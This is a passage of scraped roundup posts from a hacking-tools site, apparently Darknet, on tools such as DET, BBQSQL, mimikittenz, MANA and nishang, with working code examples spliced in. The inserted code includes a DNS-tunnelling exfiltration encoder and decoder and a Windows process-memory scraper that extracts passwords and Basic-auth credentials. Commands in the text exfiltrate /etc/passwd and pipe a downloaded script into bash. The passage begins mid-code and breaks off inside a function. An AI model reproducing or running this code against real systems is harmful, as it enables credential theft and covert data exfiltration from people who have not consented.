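
def split_oracle11g(stored: str):
    """-> (hash hex for -h, salt bytes for -salt)."""
    body = stored[2:] if stored.upper().startswith("S:") else stored
    return body[:40].lower(), bytes.fromhex(body[40:60])

def make_mssql2005(password: str, salt: bytes) -> str:
    """MSSQL 2005: 0x0100 || 4-byte salt || SHA1(UTF-16LE(password) || salt)."""
    if len(salt) != 4:
        raise ValueError("MSSQL 2005 uses a 4-byte salt")
    return "0x0100" + salt.hex() + candidate_digest(password, salt, unicode_pw=True)

def split_mssql2005(stored: str):
    """-> (hash hex for -h, salt bytes for -salt); the password must be cracked as Unicode."""
    body = stored[2:] if stored.lower().startswith("0x") else stored
    if body[:4] != "0100":
        raise ValueError("not a MSSQL 2005 hash")
    return body[12:52].lower(), bytes.fromhex(body[4:12])
```

The practical lesson is the one the tool's -min/-max limits hint at: a single unsalted-style SHA1 over each candidate is all these formats cost, so a per-user salt only stops precomputation, not a mask attack; the defence is a slow, memory-hard password hash rather than a longer salt.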

You can download IGHASHGPU here:

ighashgpu_v0.80.16.1.zip

Or read more here.



DBPwAudit – Database Password Auditing Tool


DBPwAudit is a Java database password auditing tool that allows you to perform online audits of password quality for several database engines. The application design allows for easy adding of additional database drivers by simply copying new JDBC drivers to the jdbc directory.


Configuration is performed in two files: aliases.conf maps drivers to aliases, and rules.conf tells the application how to handle error messages from the scan.

Compatibility

The tool has been tested and known to work with:

  • Microsoft SQL Server 2000/2005
  • Oracle 8/9/10/11
  • IBM DB2 Universal Database
  • MySQL

Requirements

The tool is pre-configured for these drivers but does not ship with them, due to licensing issues. The links below can be used to find some of the drivers. They should all be copied to the jdbc directory.


Links to JDBC Drivers:

MySQL
Microsoft SQL Server 2005
Microsoft SQL Server 2000
Oracle

Usage

root@darknet:~# dbpwaudit
DBPwAudit v0.8 by Patrik Karlsson <patrik@cqure.net>
----------------------------------------------------
DBPwAudit -s <server> -d <db> -D <driver> -U <users> -P <passwords> [options]

    -s - Server name or address.
    -p - Port of database server/instance.
    -d - Database/Instance name to audit.
    -D - The alias of the driver to use (-L for aliases)
    -U - File containing usernames to guess.
    -P - File containing passwords to guess.
    -L - List driver aliases.

Scan the SQL server (-s 192.168.1.130), using the specified database (-d testdb) and driver (-D MySQL) using the root username (-U root) and password dictionary (-P /usr/share/wordlists/nmap.lst):

root@darknet:~# dbpwaudit -s 192.168.1.130 -d testdb -D MySQL -U root -P /usr/share/wordlists/nmap.lst

You can download DBPwAudit here:

dbpwaudit_0_8.zip

Or read more here.


DET – Data Exfiltration Toolkit


DET is a proof of concept Data Exfiltration Toolkit using either single or multiple channel(s) at the same time.


The idea behind DET was to create a generic toolkit into which any protocol or service can be plugged, in order to test the configuration of deployed network monitoring and Data Leakage Prevention (DLP) solutions against different data exfiltration techniques.

Features

DET already supports encryption and compression and also multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other “services”:

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

The following modules are “experimental”:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode
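Whatever the channel, the sender side of a toolkit like this has to turn a file into channel-sized, self-describing pieces and the server side (-L) has to put them back together, possibly out of order when several plugins run at once. The block below is an added example, not DET's code: it compresses a file, splits it into numbered chunks and encodes each as a DNS query name (base32 so it survives case-folding resolvers, labels capped at 63 bytes, names at 253), then reassembles on the receiving side. DET also encrypts; that step is omitted here because the standard library has no AES. The naming scheme, the domain and the sample data are constructed.

```python
import base64
import re
import zlib

MAX_LABEL, MAX_NAME = 63, 253

def _b32(data: bytes) -> str:
    # DNS is case-insensitive, so base32 (lowercased, padding stripped) survives resolvers intact
    return base64.b32encode(data).decode().rstrip("=").lower()

def _unb32(label: str) -> bytes:
    label = label.upper()
    return base64.b32decode(label + "=" * (-len(label) % 8))

def encode_for_dns(data: bytes, domain: str, file_id: str, chunk_bytes: int = 30):
    """Compress, split into numbered chunks and wrap each as
    <b32chunk>.<index>-<total>.<file_id>.<domain>. Every query is self-describing,
    so chunks can go out over several channels and arrive in any order."""
    blob = zlib.compress(data)
    chunks = [blob[i:i + chunk_bytes] for i in range(0, len(blob), chunk_bytes)]
    names = []
    for idx, chunk in enumerate(chunks):
        name = f"{_b32(chunk)}.{idx}-{len(chunks)}.{file_id}.{domain}".lower()
        if any(len(lbl) > MAX_LABEL for lbl in name.split(".")) or len(name) > MAX_NAME:
            raise ValueError("chunk_bytes too large for a DNS name")
        names.append(name)
    return names

NAME_RE = re.compile(r"^([a-z2-7]+)\.(\d+)-(\d+)\.([^.]+)\.(.+)$")

def decode_from_dns(queries, domain: str):
    """Receiver side: group queries by file_id, reorder by index and decompress.
    Only files whose every chunk has arrived are returned."""
    pending = {}
    for q in queries:
        m = NAME_RE.match(q.lower())
        if not m or m.group(5) != domain.lower():
            continue
        label, idx, total, fid = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
        entry = pending.setdefault(fid, {"total": total, "chunks": {}})
        entry["chunks"][idx] = _unb32(label)
    files = {}
    for fid, entry in pending.items():
        total = entry["total"]
        if all(i in entry["chunks"] for i in range(total)):
            files[fid] = zlib.decompress(b"".join(entry["chunks"][i] for i in range(total)))
    return files

# Constructed sample, not real data
SAMPLE_SECRET = b"".join(
    f"user{i}:x:{1000 + i}:{1000 + i}::/home/user{i}:/bin/bash\n".encode() for i in range(40)
)
```

On the detection side this is also what a DLP or DNS monitor should key on: a burst of unique, high-entropy subdomains under one zone, label lengths near the 63-byte cap, and query volume out of proportion to the number of answers actually used.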

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

In the future the author hopes to add proper data obfuscation and other modules (FTP, Flickr using Steganography and YouTube).

Read more here.


BBQSQL – Blind SQL Injection Framework


BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard-to-trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. It is built on Python gevent for concurrency, making BBQSQL extremely fast.


Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.

Features

The most important thing to note about BBQSQL is that it doesn’t care about the data or database, whilst most SQL Injection tools are built with specific databases or languages in mind.

  • Exploits Blind SQL Injection Vulnerabilities
  • Semi-Automatic
  • Database Agnostic
  • Versatile
  • Utilises Two Search Techniques (binary_search & frequency_search)
  • Concurrent HTTP requests
  • Config Import/Export
  • Custom Hooks
  • Fast

Usage

Similar to other SQL injection tools you must provide certain request information for the tool to work; for BBQSQL this is:

  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

Then specify where the injection is going and what syntax we are injecting.


root@darknet:~# bbqsql
    _______   _______    ______    ______    ______   __       
   |       \ |       \  /      \  /      \  /      \ |  \      
   | $$$$$$$\| $$$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\| $$      
   | $$__/ $$| $$__/ $$| $$  | $$| $$___\$$| $$  | $$| $$      
   | $$    $$| $$    $$| $$  | $$ \$$    \ | $$  | $$| $$      
   | $$$$$$$\| $$$$$$$\| $$ _| $$ _\$$$$$$\| $$ _| $$| $$      
   | $$__/ $$| $$__/ $$| $$/ \ $$|  \__| $$| $$/ \ $$| $$_____ 
   | $$    $$| $$    $$ \$$ $$ $$ \$$    $$ \$$ $$ $$| $$     \
    \$$$$$$$  \$$$$$$$   \$$$$$$\  \$$$$$$   \$$$$$$\ \$$$$$$$$
                     \$$$                \$$$ 

                   _.(-)._
                .'         '.
               / 'or '1'='1  \
               |'-...___...-'|
                \    '='    /
                 `'._____.'` 
                  /   |   \
                 /.--'|'--.\
              []/'-.__|__.-'\[]
                      |
                     [] 

    BBQSQL injection toolkit (bbqsql)         
    Lead Development: Ben Toews(mastahyeti)         
    Development: Scott Behrens(arbit)         
    Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)    
    SET is located at: http://www.secmaniac.com(SET)    
    Version: 1.0               
    
    The 5 S's of BBQ: 
    Sauce, Spice, Smoke, Sizzle, and SQLi
    


 Select from the menu:

   1) Setup HTTP Parameters
   2) Setup BBQSQL Options
   3) Export Config
   4) Import Config
   5) Run Exploit
   6) Help, Credits, and About

  99) Exit the bbqsql injection toolkit

bbqsql>

HTTP Parameters

BBQSQL has many HTTP parameters you can configure when setting up your attack. At a minimum you must provide the URL (with the point where the injected query goes marked, see below) and the HTTP method. The following options can be set:

  • files
  • headers
  • cookies
  • url
  • allow_redirects
  • proxies
  • data
  • method
  • auth

You specify where you want the injection query to be inserted by using the template ${injection}. Without the injection template the tool won't know where to insert the query.

You can download BBQSQL here:

bbqsql-v1.1.zip

Or read more here.

The post BBQSQL – Blind SQL Injection Framework appeared first on Darknet - The Darkside.

MANA Toolkit – Rogue Access Point (evilAP) And MiTM Attack Tool

MANA Toolkit is a set of tools for rogue access point (evilAP) attacks and wireless MiTM.

MANA Toolkit - Rogue Access Point (evilAP) And MiTM Attack Tool

More specifically, it contains the improvements to KARMA attacks implemented into hostapd, as well as some useful configs for conducting MitM once you’ve managed to get a victim to connect.

Contents

MANA Toolkit contains:

  • kali/ubuntu-install.sh – simple installers for Kali 1.0.9 and Ubuntu 14.04 (trusty)
  • slides – an explanation of what we’re doing here
  • run-mana – the controller scripts
  • hostapd-mana – modified hostapd that implements our new mana attacks
  • crackapd – a tool for offloading the cracking of EAP creds to an external tool and re-adding them to the hostapd EAP config (auto crack ‘n add)
  • sslstrip-hsts – our modifications to LeonardoNVE’s & moxie’s cool tools
  • apache – the apache vhosts for the noupstream hacks; deploy to /etc/apache2/ and /var/www/ respectively

Installation

The simplest way to get up and running is to run “apt-get install mana-toolkit” on Kali. If you want to go manual to get the latest version, check below. Make sure to edit the start script to point to the right Wi-Fi device.


To get up and running on Kali, set up a Kali box (VM or otherwise), update it, then run kali-install.sh.

To get up and running on Ubuntu 14.04, set up an Ubuntu 14.04 box (VM or otherwise), update it, then run ubuntu-install.sh.

If you’re installing from git, you can use the following commands after you have grabbed the necessary dependencies:

git clone --depth 1 https://github.com/sensepost/mana
cd mana
git submodule init
git submodule update
make
make install

You can download MANA Toolkit here:

Source: mana-1.3.1.zip
Binary: mana-toolkit-1.3-1debian1_amd64.deb

Or read more here.


OWASP OWTF – Offensive Web Testing Framework

OWASP Offensive Web Testing Framework is a project focused on penetration testing efficiency and alignment of security tests to security standards like: The OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.

OWASP OWTF - Offensive Web Testing Framework

The purpose of this tool is to automate the manual and uncreative parts of pen testing. For example, figuring out how to call tool X, then manually parsing its results to feed tool Y, and so on, is time-consuming.

By reducing this burden we hope pen testers will have more time to:

  • See the big picture and think out of the box
  • Find, verify and combine vulnerabilities efficiently
  • Investigate complex vulnerabilities like business logic, architectural flaws, virtual hosting sessions, etc.
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short time-frames we are typically given to test

This tool is however not a silver bullet and will only be as good as the person using it. Understanding and experience will be required to correctly interpret the tool output and decide what to investigate further in order to demonstrate the impact.

Features

  • Web UI. Now configure and monitor OWTF via a responsive and powerful interface accessible via your browser.
  • Exposes RESTful APIs to all core OWTF capabilities.
  • Instead of implementing yet another spider (a hard job), OWTF will scrub the output of all tools/plugins run to gather as many URLs as possible.
  • Scan by various aggression levels: OWTF supports scans which are based on the aggressiveness of the plugins/tools invoked.
  • Extensible: OWTF manages tools through ‘plugins’, making it trivial to add new tools.
  • OWTF has been developed keeping Kali Linux in mind, but it also supports other pentesting distros such as Samurai-WTF, etc.
  • Tool paths and configuration can be easily modified in the web interface.
  • Fastest Python MiTM proxy yet!
  • Crash reporting directly to Github issue tracker
  • Comprehensive interactive report at end of each scan
  • Easy plugin-based system; currently 100+ plugins!
  • CLI and web interface

You can download OWASP OWTF here:

wget -N https://raw.githubusercontent.com/owtf/bootstrap-script/master/bootstrap.sh; bash bootstrap.sh

Or read more here.


mimikittenz – Extract Plain-Text Passwords From Memory

mimikittenz is a post-exploitation PowerShell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes.

mimikittenz - Extract Plain-Text Passwords From Memory

The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of information gathered per target.

NOTE: This tool targets the address space of running processes. Once a process is killed its memory should be cleaned up and inaccessible, but there are edge cases in which this does not happen.
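Added example in Python rather than PowerShell, not mimikittenz's own code: the same approach, walking a target process's committed memory with VirtualQueryEx() and ReadProcessMemory() through ctypes and running credential regexes over what comes back. The two patterns and the chunk-overlap size are constructed for this example and real ones have to match the target application's request format; the memory walk only runs on Windows (with a Python of the same bitness as the target), while the scanning functions work on any OS over bytes you hand them.

```python
import base64
import ctypes
import re
import sys
from ctypes import POINTER, Structure, byref, c_int, c_size_t, c_ulong, c_void_p, create_string_buffer, sizeof


def _form_cred(m):
    return m.group("user").decode(errors="replace"), m.group("pass").decode(errors="replace")


def _basic_cred(m):
    """HTTP Basic header: base64 of user:pass; reject anything that does not decode cleanly."""
    try:
        user, _, pw = base64.b64decode(m.group("b64"), validate=True).partition(b":")
    except ValueError:
        return None
    return (user.decode(errors="replace"), pw.decode(errors="replace")) if pw else None


# Constructed patterns in the style mimikittenz ships per application: (name, bytes regex, match -> cred).
PATTERNS = [
    ("form-post", re.compile(rb"(?:user|login)=(?P<user>[^&\s\x00]{1,64})&(?:pass|password|pwd)=(?P<pass>[^&\s\x00]{1,128})"), _form_cred),
    ("http-basic", re.compile(rb"Authorization: Basic (?P<b64>[A-Za-z0-9+/]{4,512}={0,2})"), _basic_cred),
]

OVERLAP = 4096  # bytes of the previous chunk kept so a credential split across two reads is still seen


def scan_block(data: bytes, patterns=PATTERNS):
    hits = []
    for name, rx, extract in patterns:
        for m in rx.finditer(data):
            cred = extract(m)
            if cred:
                hits.append((name,) + cred)
    return hits


def scan_chunks(chunks, patterns=PATTERNS):
    """Scan contiguous memory chunks with a carried overlap, de-duplicating repeated finds."""
    seen, found, tail = set(), [], b""
    for chunk in chunks:
        window = tail + chunk
        for hit in scan_block(window, patterns):
            if hit not in seen:
                seen.add(hit)
                found.append(hit)
        tail = window[-OVERLAP:]
    return found


MEM_COMMIT, PAGE_NOACCESS, PAGE_GUARD = 0x1000, 0x01, 0x100
PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010


class MEMORY_BASIC_INFORMATION(Structure):
    _fields_ = [("BaseAddress", c_void_p), ("AllocationBase", c_void_p), ("AllocationProtect", c_ulong),
                ("RegionSize", c_size_t), ("State", c_ulong), ("Protect", c_ulong), ("Type", c_ulong)]


def iter_process_memory(pid: int, chunk_size: int = 1 << 20):
    """Yield readable committed regions of another process (Windows only). Needs only
    PROCESS_VM_READ, which a user normally has on their own processes: no admin required."""
    if sys.platform != "win32":
        raise OSError("ReadProcessMemory is a Windows API")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype, k32.OpenProcess.argtypes = c_void_p, [c_ulong, c_int, c_ulong]
    k32.VirtualQueryEx.restype = c_size_t
    k32.VirtualQueryEx.argtypes = [c_void_p, c_void_p, POINTER(MEMORY_BASIC_INFORMATION), c_size_t]
    k32.ReadProcessMemory.restype = c_int
    k32.ReadProcessMemory.argtypes = [c_void_p, c_void_p, c_void_p, c_size_t, POINTER(c_size_t)]
    k32.CloseHandle.argtypes = [c_void_p]
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        mbi, addr = MEMORY_BASIC_INFORMATION(), 0
        while k32.VirtualQueryEx(handle, addr, byref(mbi), sizeof(mbi)):
            base = mbi.BaseAddress or 0
            # Skip reserved/free regions and pages a read would fault on (no-access, guard pages).
            readable = mbi.State == MEM_COMMIT and mbi.Protect != PAGE_NOACCESS and not mbi.Protect & PAGE_GUARD
            if readable:
                offset = 0
                while offset < mbi.RegionSize:
                    size = min(chunk_size, mbi.RegionSize - offset)
                    buf, got = create_string_buffer(size), c_size_t(0)
                    if k32.ReadProcessMemory(handle, base + offset, buf, size, byref(got)):
                        yield buf.raw[:got.value]
                    offset += size
            addr = base + mbi.RegionSize
    finally:
        k32.CloseHandle(handle)


def scan_process(pid: int):
    """Run the credential patterns over every readable region of one process."""
    return scan_chunks(iter_process_memory(pid))


if __name__ == "__main__":
    for hit in scan_process(int(sys.argv[1])):
        print(hit)
```

The overlap is what keeps a credential that straddles two ReadProcessMemory() calls from being missed; it also means the tail of one region is prepended to the next, which can only produce a false join across non-adjacent memory, never a miss.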

Features

Currently mimikittenz is able to extract the following credentials from memory:


Webmail

  • Gmail
  • Office365
  • Outlook Web

Accounting

  • Xero
  • MYOB

Remote Access

  • Juniper SSL-VPN
  • Citrix NetScaler
  • Remote Desktop Web Access 2012

Development

  • Jira
  • Github
  • Bugzilla
  • Zendesk
  • Cpanel

IHateReverseEngineers

  • Malwr
  • VirusTotal
  • AnubisLabs

Misc

  • Dropbox
  • Microsoft Onedrive
  • AWS Web Services
  • Slack
  • Twitter
  • Facebook

You can download mimikittenz here:

Invoke-mimikittenz.ps1

Or read more here.


mitmproxy – Intercepting HTTP Proxy Tool aka MITM

mitmproxy is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

mitmproxy - Intercepting HTTP Proxy Tool aka MITM

It’s a console tool that allows interactive examination and modification of HTTP traffic. It differs from mitmdump in that all flows are kept in memory, which means that it’s intended for taking and manipulating small-ish samples.

The command-line companion called mitmdump provides tcpdump-like functionality to let you view, record, and programmatically transform HTTP traffic.

Features

  • Intercept HTTP requests and responses and modify them on the fly.
  • Save complete HTTP conversations for later replay and analysis.
  • Replay the client side of an HTTP conversation.
  • Replay HTTP responses of a previously recorded server.
  • Reverse proxy mode to forward traffic to a specified server.
  • Transparent proxy mode on OSX and Linux.
  • Make scripted changes to HTTP traffic using Python.
  • SSL certificates for interception are generated on the fly.
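Added example of the “scripted changes” feature, not code from the mitmproxy project: an addon that stamps a marker header on every outbound request, flags credentials submitted over cleartext HTTP, and records security headers missing from HTML responses. The header names, the marker value, the findings store and the small stand-in Request/Response class used to run it offline are assumptions for this example; it is written against the current addon API (module-level `request`/`response` hooks, run with `mitmdump -s addon.py`), which differs from the `(context, flow)` hook signature of the 0.x releases linked below.

```python
import re

# Assumption for this example: a marker header agreed with the client so the target's logs
# can tell engagement traffic from everything else.
MARKER_HEADER, MARKER_VALUE = "X-Pentest-Marker", "engagement-1234"

REQUIRED_RESPONSE_HEADERS = ("Strict-Transport-Security", "Content-Security-Policy", "X-Content-Type-Options")
_CRED_IN_BODY = re.compile(rb"(?i)(?:pass(?:word)?|pwd)=")

FINDINGS = []  # (host, finding) tuples collected while the proxy runs


def check_request(request):
    """Scripted change plus a passive check. Mutates the request in place and returns findings.
    mitmproxy's Headers object is case-insensitive; the offline stand-in below is not."""
    request.headers[MARKER_HEADER] = MARKER_VALUE
    findings = []
    carries_creds = "Authorization" in request.headers or _CRED_IN_BODY.search(request.content or b"")
    if request.scheme == "http" and carries_creds:
        findings.append("credentials sent over cleartext HTTP")
    return findings


def check_response(response):
    """Report hardening headers absent from a response."""
    return [f"missing {h}" for h in REQUIRED_RESPONSE_HEADERS if h not in response.headers]


def request(flow):  # mitmproxy hook: called for every client request before it is forwarded
    for finding in check_request(flow.request):
        FINDINGS.append((flow.request.pretty_host, finding))
        print(f"[!] {flow.request.pretty_host}: {finding}")


def response(flow):  # mitmproxy hook: called once the server response is available
    if flow.response.status_code == 200 and "text/html" in flow.response.headers.get("Content-Type", ""):
        for finding in check_response(flow.response):
            FINDINGS.append((flow.request.pretty_host, finding))
            print(f"[!] {flow.request.pretty_host}: {finding}")


class FakeMessage:
    """Constructed stand-in for mitmproxy's Request/Response so the checks run without a proxy."""

    def __init__(self, headers=None, scheme="https", content=b"", status_code=200, pretty_host="app.example"):
        self.headers = dict(headers or {})
        self.scheme, self.content, self.status_code, self.pretty_host = scheme, content, status_code, pretty_host


if __name__ == "__main__":
    req = FakeMessage(scheme="http", content=b"user=alice&password=hunter2")
    print(check_request(req), req.headers)
    print(check_response(FakeMessage(headers={"Content-Type": "text/html"})))
```

Because every flow passes through the same two functions, the request hook is also the place to rewrite parameters or replay tokens for a specific test; keep the pure `check_*` functions separate from the hooks so they can be unit-tested without a running proxy.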

Installation

Ubuntu comes with Python but we need to install pip, python-dev and several libraries. This was tested on a fully patched installation of Ubuntu 14.04.

sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
sudo pip install mitmproxy

Once installation is complete you can run mitmproxy or mitmdump from a terminal.

On Ubuntu 12.04 (and other systems with an outdated version of pip), you may need to update pip using pip install -U pip before installing mitmproxy.

You can download mitmproxy here:

mitmproxy-v0.17.1.zip

Or read more here.



DyMerge – Bruteforce Dictionary Merging Tool

DyMerge is a simple, yet powerful bruteforce dictionary merging tool, written purely in Python, which takes given wordlists and merges them into one dynamic dictionary that can then be used as ammunition for a dictionary-based (or bruteforce) attack.

DyMerge - Bruteforce Dictionary Merging Tool

The idea came to the author while working through a CTF challenge: how powerful a single dictionary could become if it contained every relevant wordlist, whether extracted from previous leaks, shipped with everyday cracking tools, or produced by custom wordlist generators, all in one.

DyMerge lets you sit back while your password cracking tool does its job, without worrying that you will most probably have to try a different dictionary next, one that undoubtedly contains many of the same words as the previous one.


DyMerge deals with that issue for you as it removes duplicates.
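Added example, not DyMerge's own code, of the merge-and-deduplicate step: each input list is normalised (line endings stripped, UTF-8 decoded with a Latin-1 fallback for the 8-bit bytes leaked lists often contain, length bounds applied) and first-seen order is preserved so the best-curated list can go first and its candidates get tried first. The sample lists are constructed; the length bounds are assumptions to tune for the target hash.

```python
def iter_words(raw_lines, min_len=1, max_len=64):
    """Normalise one wordlist given as an iterable of bytes lines (a file opened 'rb' works).
    Leaked lists mix encodings, so a line that is not valid UTF-8 is read as Latin-1 rather
    than dropped: 'caf\\xe9' and 'caf\\xc3\\xa9' are the same candidate."""
    for raw in raw_lines:
        line = raw.rstrip(b"\r\n")
        if not line:
            continue
        try:
            word = line.decode("utf-8")
        except UnicodeDecodeError:
            word = line.decode("latin-1")
        if min_len <= len(word) <= max_len:
            yield word


def merge_wordlists(sources, min_len=1, max_len=64):
    """Merge several wordlists into one de-duplicated list, keeping first-seen order.
    Returns (words, stats); 'read' counts candidates that passed the length filter."""
    seen, merged = set(), []
    stats = {"read": 0, "duplicates": 0, "kept": 0}
    for src in sources:
        for word in iter_words(src, min_len, max_len):
            stats["read"] += 1
            if word in seen:
                stats["duplicates"] += 1
                continue
            seen.add(word)
            merged.append(word)
    stats["kept"] = len(merged)
    return merged, stats


def merge_files(paths, out_path, **bounds):
    """File front end: read each path in binary mode, write the merged list as UTF-8, LF-terminated."""
    handles = [open(p, "rb") for p in paths]
    try:
        words, stats = merge_wordlists(handles, **bounds)
    finally:
        for h in handles:
            h.close()
    with open(out_path, "w", encoding="utf-8", newline="\n") as out:
        out.write("\n".join(words) + "\n")
    return stats


if __name__ == "__main__":
    import sys
    print(merge_files(sys.argv[1:-1], sys.argv[-1]))
```

The `seen` set holds every unique entry in memory, which is fine for lists in the tens of millions of lines; beyond that, or when order does not matter, an external sort (`sort -u`) is the right tool.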

Usage

Usage: python dymerge.py {dictionaries} [options]

To view all available options run:

$ python dymerge.py -h

You can download DyMerge here:

git clone https://github.com/k4m4/dymerge.git

Or read more here.


nishang – PowerShell For Penetration Testing

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for penetration testing, offensive security and red teaming. Nishang is useful during all phases of penetration testing.

nishang - PowerShell For Penetration Testing

Usage

Import all the scripts in the current PowerShell session (PowerShell v3 onwards).

PS C:\nishang> Import-Module .\nishang.psm1

Use the individual scripts with dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

To get help about any script or function, use:

PS C:\nishang> Get-Help [scriptname] -full

Note that since version 0.3.8 the help is attached to the function that is loaded when the script is dot-sourced, not to the script file itself. In all cases the function name is the same as the script name.


For example, to see the help about Get-WLAN-Keys.ps1, use

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Scripts

Nishang comes with a myriad of scripts divided into various categories:

  • ActiveDirectory
  • Backdoors
  • Clients
  • Escalation
  • Execution
  • Gathering
  • MiTM
  • Pivoting
  • Scanning
  • Powerpreter
  • Shells
  • Utilities

You can download Nishang here:

nishang-v0.6.7.zip

Or read more here.


Zenmap – Official Cross-Platform Nmap GUI

Zenmap is the official Nmap GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

Zenmap - Official Cross-Platform Nmap GUI

No frontend can replace good old command-line Nmap. The nature of a frontend is that it depends on another tool to do its job. Therefore the purpose of Zenmap is not to replace Nmap, but to make Nmap more useful. Here are some of the advantages Zenmap offers over plain Nmap.


Purpose

  • Interactive and graphical results viewing – In addition to showing Nmap’s normal output, Zenmap can arrange its display to show all ports on a host or all hosts running a particular service. It summarizes details about a single host or a complete scan in a convenient display. Zenmap can even draw a topology map of discovered networks. The results of several scans may be combined together and viewed at once.
  • Comparison – Zenmap has the ability to show the differences between two scans. You can see what changed between the same scan run on different days, between scans of two different hosts, between scans of the same hosts with different options, or any other combination. This allows administrators to easily track new hosts or services appearing on their networks, or existing ones going down.
  • Convenience – Zenmap keeps track of your scan results until you choose to throw them away. That means you can run a scan, see the results, and then decide whether to save them to a file. There is no need to think of a file name in advance.
  • Repeatability – Zenmap’s command profiles make it easy to run the exact same scan more than once. There’s no need to set up a shell script to do a common scan.
  • Discoverability – Nmap has literally hundreds of options, which can be daunting for beginners. Zenmap’s interface is designed to always show the command that will be run, whether it comes from a profile or was built up by choosing options from a menu. This helps beginners learn and understand what they are doing. It also helps experts double-check exactly what will be run before they press “Scan”.

Features

  • Frequently used scans can be saved as profiles to make them easy to run repeatedly.
  • A command creator allows interactive creation of Nmap command lines.
  • Scan results can be saved and viewed later.
  • Saved scan results can be compared with one another to see how they differ.
  • The results of recent scans are stored in a searchable database.

Zenmap is included in the Windows and Mac OS X installers and in the source tarball, so download one of those:

– Windows: nmap-7.31-setup.exe
– Mac OSX: nmap-7.31.dmg
– Source: nmap-7.31.tar.bz2

Or read more here.


Infernal Twin Updated 2.6.11 – Automated Wireless Hacking Suite

Infernal Twin is an automated wireless hacking suite written in Python which automates many of the repetitive tasks involved in security testing for wifi networks.

Infernal Twin - Automated Wireless Hacking Suite

Originally created to automate the Evil Twin attack, it has grown much beyond that into a comprehensive suite including various wireless attack vectors.

An evil twin attack is when an attacker sets an access point's service set identifier (SSID) to be the same as a legitimate access point at the local hotspot or corporate wireless network. The attacker then disrupts or disables the legitimate AP by deauthenticating clients from it, directing a denial of service against it, or creating RF interference around it.

Users lose their connections to the legitimate AP and re-connect to the “evil twin,” allowing the hacker to intercept all the traffic to that device.
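Added example, not code from Infernal Twin or MANA, showing the defender's side of the two rogue-AP behaviours described on this page: the KARMA/MANA pattern (the hostapd modification in the MANA Toolkit above) of a single BSSID answering probe requests for whatever SSID a client asks for, and the evil twin of a known SSID advertised from a BSSID that is not in the inventory. The observations and the AP inventory are constructed; a real sensor would fill them from monitor-mode captures of beacon and probe-response frames, and the threshold is an assumption to tune for sites whose APs legitimately serve several SSIDs from one BSSID.

```python
from collections import defaultdict

# Constructed observations, as a monitor-mode sensor would log them after parsing 802.11
# management frames (frame parsing itself is out of scope here).
OBSERVED_FRAMES = [
    {"type": "beacon",     "bssid": "aa:bb:cc:00:00:01", "ssid": "CorpWiFi",  "channel": 6},
    {"type": "beacon",     "bssid": "aa:bb:cc:00:00:02", "ssid": "CorpWiFi",  "channel": 11},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:01", "ssid": "CorpWiFi",  "channel": 1},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:01", "ssid": "HomeNet",   "channel": 1},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:01", "ssid": "Starbucks", "channel": 1},
    {"type": "beacon",     "bssid": "de:ad:be:ef:00:01", "ssid": "attwifi",   "channel": 1},
    {"type": "beacon",     "bssid": "11:22:33:44:55:66", "ssid": "Neighbor",  "channel": 3},
    {"type": "probe_resp", "bssid": "fe:ed:fa:ce:00:01", "ssid": "CorpWiFi",  "channel": 6},
]

# Constructed inventory of the BSSIDs legitimately serving each managed SSID.
KNOWN_APS = {"CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}

KARMA_SSID_THRESHOLD = 3  # distinct SSIDs one BSSID answers for before we call it a KARMA/MANA AP


def analyse(frames, known_aps, karma_threshold=KARMA_SSID_THRESHOLD):
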